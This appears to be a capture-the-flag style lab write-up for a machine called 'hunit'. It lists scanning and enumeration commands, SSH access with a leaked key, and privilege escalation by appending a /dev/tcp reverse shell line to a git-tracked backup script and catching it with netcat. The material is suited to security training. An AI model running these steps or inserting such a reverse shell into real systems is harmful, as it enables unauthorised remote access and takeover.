nmap -A -p- -oA hunit 192.168.123.125 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA hunit 192.168.123.125

nmap -sU -O -p- -oA hunit-udp 192.168.123.125

nikto -h 192.168.123.125:80

Pasted image 20211006115830.png

Pasted image 20211006120206.png

When we click one of the links, we can see a comment like the one below.

Pasted image 20211006120129.png

curl http://192.168.123.125:8080/api/

Pasted image 20211006120531.png

curl http://192.168.123.125:8080/api/user

Pasted image 20211006120603.png

smbclient -L 192.168.123.125 -p 12445

Pasted image 20211006120815.png

ssh dademola@192.168.123.125 -p 43022

Pasted image 20211006121040.png

With linpeas.sh we get the following:

Pasted image 20211006121136.png

We see that this is a backup.

Pasted image 20211006121256.png

We see that git is another regular user.

Pasted image 20211006121345.png

git clone file:////git-server

Pasted image 20211006123335.png

cd home/git

Pasted image 20211006124518.png

ssh -i id_rsa git@192.168.123.125 -p 43022

Pasted image 20211006125719.png

cd git-server

vim backups.sh

chmod +x backups.sh

echo "sh -i >& /dev/tcp/192.168.49.123/8080 0>&1" >> backups.sh

git add .

git commit -m "reverse"

Pasted image 20211006131146.png

GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git push origin master

nc -lvnp 8080

Pasted image 20211006132509.png

whoami

Pasted image 20211006134840.png


copyright©2022 Cu3rv0x all rights reserved